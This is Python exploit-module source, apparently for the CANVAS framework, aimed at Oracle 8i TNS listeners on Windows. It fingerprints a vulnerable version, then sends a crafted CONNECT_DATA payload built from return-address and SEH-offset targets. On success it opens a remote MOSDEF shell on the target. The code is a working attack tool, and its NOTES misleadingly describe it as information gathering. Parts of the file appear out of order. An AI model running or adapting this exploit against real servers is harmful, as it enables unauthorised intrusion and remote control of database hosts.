def requestDatabaseInfo(self):
ret = 0
s = self.connectToHost(self.host, self.port)
if not s:
return ret
s.set_timeout(150)
self.log("Timeout is %d" % s.get_timeout())
tnsconn = tnslib.TNSCONNECT()
vsnreq = tnsconn.getStatusCommand()
TNS = tnslib.TNS()
TNS.sendConnectRequest(s, vsnreq)
TNS.recvTNSPkt(s)
if (TNS.packet_type == TNS.TNS_TYPE_REFUSE
): #should have received database info
self.log("Request for database info was refused.")
ret = 0
elif (TNS.packet_type == TNS.TNS_TYPE_ACCEPT
): #should have received database info
self.log("Received database info")
ret = TNS.recvAcceptData(s, TNS.tns_data)
else:
self.log("Did not receive database info")
ret = 0
s.close()
return ret
def test(self):
#get server version
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
s = self.connectToHost(self.host, self.port)
if s:
self.log("Connected to TNS listener at %s:%d" %
(self.host, self.port))
else:
return 0
cdata = "(CONNECT_DATA="
cdata += "(COMMAND=VERSION)"
cdata += ")"
TNS = tnslib.TNS()
TNS.sendRawCommand(s, cdata)
rdata = TNS.recvRawData(s)
s.close()
if rdata.count("TNSLSNR for 32-bit Windows: Version 8.1.7.0.0"):
self.log("Vulnerable Oracle8i version detected")
return 1
return 0
def run(self):
self.host = self.target.interface
print "Attacking: %s" % self.host
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
if self.version == 0:
self.log("Auto versioning not available")
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
self.info, self.align, self.retadd, self.seoffset = targets[
self.version]
cdata = self.buildCdata(self.align, self.retadd, self.seoffset)
s = self.connectToHost(self.host, self.port)
if not s:
self.log("Could not connect to TNS listener")
return 0
if s:
self.log("Connected to TNS listener at %s:%d" %
(self.host, self.port))
TNS = tnslib.TNS()
TNS.sendRawCommand(s, cdata)
else:
self.done = 1
if self.checkTriggerWin32(s):
self.log("Setting success flag")
self.setSucceeded()
self.done = 1
import win32MosdefShellServer
from win32Node import win32Node
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
ret = node
else:
s.close()
if self.ISucceeded():
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
return ret
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
GTK2_DIALOG = "dialog.glade2"
affectsList = ["Tools"]
NOTES = """
Attempt to gather some information on a remote Oracle database
"""
CHANGELOG = """
"""
# GUI run exploit
runAnExploit_gtk2 = canvasengine.runAnExploit_gtk2
runExploit = canvasengine.runExploit
TNS = tnslib.TNS()
TNSCONN = tnslib.TNSCONNECT()
class theexploit(tcpexploit):
def __init__(self):
tcpexploit.__init__(self)
self.setInfo(DESCRIPTION)
self.host = "vmware.local"
self.port = 1521 #this is the only real variable
self.done = 0
self.version = 0
self.dbasenames = []
self.result = {}
self.name = NAME
return